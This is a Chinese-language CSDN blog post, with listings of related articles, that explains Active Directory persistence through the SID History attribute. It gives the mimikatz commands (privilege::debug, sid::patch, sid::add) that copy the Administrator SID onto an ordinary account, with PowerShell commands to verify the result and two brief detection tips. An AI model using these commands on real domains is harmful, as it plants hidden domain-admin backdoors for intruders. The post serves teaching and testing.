域渗透|域权限维持之SID History

最新推荐文章于 2024-03-22 18:23:09 发布
最新推荐文章于 2024-03-22 18:23:09 发布
阅读量388 收藏 1
点赞数
分类专栏: 域渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42282189/article/details/120117059
版权

作者:r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x00 前言

SID的主要作用是跟踪安全主体控制用户连接资源时的访问权限。
SID History 是在域迁移过程中需要使用的一个属性,SID History 主要作用是在域迁移过程中保持域用户的访问权限,如果迁移后域用户的SID改变了,系统会将其原来的SID添加到迁移用户的SID History 属性中,使迁移后的用户保持原有的权限、能够访问其原来可以访问的资源。
因此使用mimikatz可以将SID History 属性添加到域中任意用户的SID History 属性中。
在域渗透中,如果获得了域管理员权限,就可以将SID History 作为域权限维持方法。

0x01 本地测试

1、首先将Administrator的SID添加到恶意用户test的SID History属性中,首先在powershell查看test用户的SID History 属性:

Import-Module ActiveDirectory
Get-ADUser test -Properties sidhistory

在这里插入图片描述
2、然后以管理员权限运行mimikatz,将Administrator的SID添加到test用户的SID History 属性中:

privilege::debug
sid::patch
sid::add /sam:test /new:administrator

在这里插入图片描述
3、再次查看test用户的SID History:

Get-ADUser test -Properties sidhistory

在这里插入图片描述

0x01 总结

1、检查SID为500的用户;
2、域迁移之后,对相同SID History 属性的用户进行检查

0x02 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

灼剑(Tsojan)安全团队
关注
专栏目录
内网渗透(六十九)之权限维持SID History 滥用
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-12 783
SID是用于标识主体的可变长度的唯一值,每个账户都有一个系统颁发的唯一SID,其存储在数据库(中的话就存储在活动目录数据库中)。用户每次登录时,系统都会从数据库中检索该用户的SID,并将其放在该用户的访问令牌中。系统使用访问令牌中的SID来识别与Windows安全所有后续交互中的用户。当SID被用作用户或组的唯一标识符时,他再也不能用于标识另一个用户或组。在活动目录数据库中对象的objectSid属性值就是SID
内网渗透-内的权限维持
lza20001103的博客
10-01 1032
内的权限维持 文章目录内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下内的权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
权限维持之:SID History 权限维持
f_carey的博客
12-18 953
权限维持之:SID History 权限维持1 SID 作用2 利用 SID History 操作过程3 SID History 权限维持的防御 1 SID 作用 ​ 每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限SID History是在迁移过程中需要使用的一个属性。 ​ 如果A中的用户迁移到B中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在迁移过程中保持用户的访问权限
渗透 - 权限维持 SID History
whojoe的博客
08-03 430
渗透 - 权限维持 SID History环境搭建SID History属性介绍利用条件利用同一个内同一树下的提权利用方式参考文章 环境搭建 这里需要父子 可以参考 https://blog.csdn.net/qq_43645782/article/details/119330508 机器名 ip 用户 密码 dns fad.test.com 192.168.164.146 administrator Aa1234 192.168.164.146 cad.ch.test.com
关于SidHistory
weixin_30952535的博客
08-12 226
先说明一下什么是SID历史,SID不可能重复,二个迁移为了保持原有的安全性微软在对象的属性中添加了SidHistory这一属性,其实SidHistory也就是原SID。如果在做二个森林之间的帐号迁移(使用ADMT2.0)且做了双向信任并加了/EnableSidHistory参数,WIN2000SP4/WIN2003默认会做FilterSIDs的操作,此时迁移帐号时会过滤掉源SID,即在...
domain SID History attributes
include_heqile的博客
10-29 445
原文链接 domain SID History attributes主要用来支持的迁移 每一个用户都有一个SID用于标识安全主体以及该用户对特定资源的访问权限SID History使得被克隆的用户可以访问之前用户能够访问的资源。这样就可以保证当一个用户迁移到另一个中之后仍然可以访问以前所在中的资源。 因为用户迁移到新的之后,他的SID就会发生改变,所以需要将其原来的OLD SID映射...
SID History后门及检测思路分析
最新发布
#7的博客
03-22 933
可以看成是黄金票据的一种拿到krbtgt之后将高权限用户的SID History添加到低权限的用户中注入到内存进行Dcsync或进行远程登录等,需要注意的是该操作并不会在控的LDAP属性中添加,只会在攻击机的票据PAC中添加到高权限SID History。privilege::debug sid::patch sid::add /sam:whoami/new:Administrator (将Administrator的SID添加到whoami的SID History属性中)
权限维持方法浅析.pdf
08-08
SID History SID History -Golden Ticket Now More GOLDEN! Directory Service Restore Mode (DSRM) DSRM -Pass The Hash&DCSync Malicious Security Support Provider (SSP) Hook PasswordChangeNotify Skeleton ...
SID History权限维持
weixin_41082546的博客
05-05 595
一、简介   每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限SID History是在迁移过程中需要使用的一个属性。   如果A中的用户迁移到B中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在迁移过程中保持用户的访问权限,如果迁移后用户的SID值改变,系统会将原...
权限维持SID History后门
01-29 361
01、简介 每个用户都有一个关联的安全标识符(SID),SID History的作用是在迁移过程中保持用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。 02、利用方式 (1)使用管理员权限查看test用户的SID History属性 PS C:\Users\Ad...
渗透测试之子到父的横向移动(Sid History)
Candour_0的博客
02-20 389
渗透测试之子到父的横向移动(Sid History)
SIDHistory属性的利用
热门推荐
Shanfenglan's blog
12-24 4万+
文章目录1. 前言2.对某用户的SIDHistory属性进行操作2.1 查询zhangsan的SIDHistory2.2 给zhangsan用户添加管的sid2.3 删除zhangsan的SIDHistory属性3.利用思路3.1 权限维持3.2 利用当前用户的sidhistory属性防御方法 1. 前言 SIDHistory属性的存在是为了解决用户在迁移到另一个中的时候权限会改变的问题。例如用户zhangsan在A中本来是管理员,迁移到B的时候因为sid的改变有可能会变成普通用户权限,这时候如果给
如何查找用户的SID
weixin_33961829的博客
01-24 2084
1. 运行命令adsiedit.msc打开ADSI EDIT控制台。 2. 右键点击ADSI EDIT,选择Connect to,在弹出的窗口中点击OK。 3. 展开Default naming context\DC=domain,DC=com\CN=Users。 4. 选择我们想要查看的用户,右键点击并选择Pr...
[原创]ADMT2.0迁移案例+SIDHistory验证(第二版)-转自Winmag 作者:江小帅
技术日志
05-24 5985
[原创]ADMT2.0迁移案例+SIDHistory验证(第二版)转自:Winmag.com.cn 作者:江小帅http://desperado.blogdriver.com/仅以此篇文档献给本人(江小帅)的女朋友,因为她的存在《ADMT迁移案例+SIDHistory验证第二版》才推迟了1个多星期。她在正常作息时间上对小帅的苛刻要求才真正是这篇文档发布的绊脚石。正是在她“坚决按时吃饭、绝对保证睡眠
客户端访问故障(用户显示sid号不能显示用户名)
李荣权的专栏--OS--Soft--Life
05-25 3483
客户端访问故障(用户显示sid号不能显示用户名) 具体详见下图所示  在客户机检测成员显示失败 现象:计算机加入后能正常使用所有功能,重新启动后功能失效。 分析:用户显示成sid号说明客户端与控制器通讯故障。 解决过程:分析服务器日志没有错误信息分析客户端日志,发现策略应用失败,net logon服务启动失败
ADMT 迁移后用户或群组的SID HISTORY删除
weixin_34248023的博客
11-18 261
Technorati Tags: 夏明亮,ADMT,SIDHISTORY,删除,清除,clear,remove 大家都知道在两个林()之间迁移账户可以使用ADMT工具,他可以帮助我们把源中账户迁移到目标中,并把源账户的sid赋予目标账户的SIDHISTORY属性中,使得目标账户可以使用sidhistory属性来继续拥有源于中的账户的权限。 ...
权限持久化之SID History后门
谢公子的博客
02-27 2028
每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限SID History是在迁移过程中需要使用的一个属性。 如果将A中的用户迁移到B中,那么在B中新建的用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在迁移过程中保持用户的访问权限,即如果迁移后用户的SID改变了,系统会将...
权限维持】-SIDHistory
qq_41617902的博客
01-20 198
SID History的作用是在迁移过程中保持用户的访问权限
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值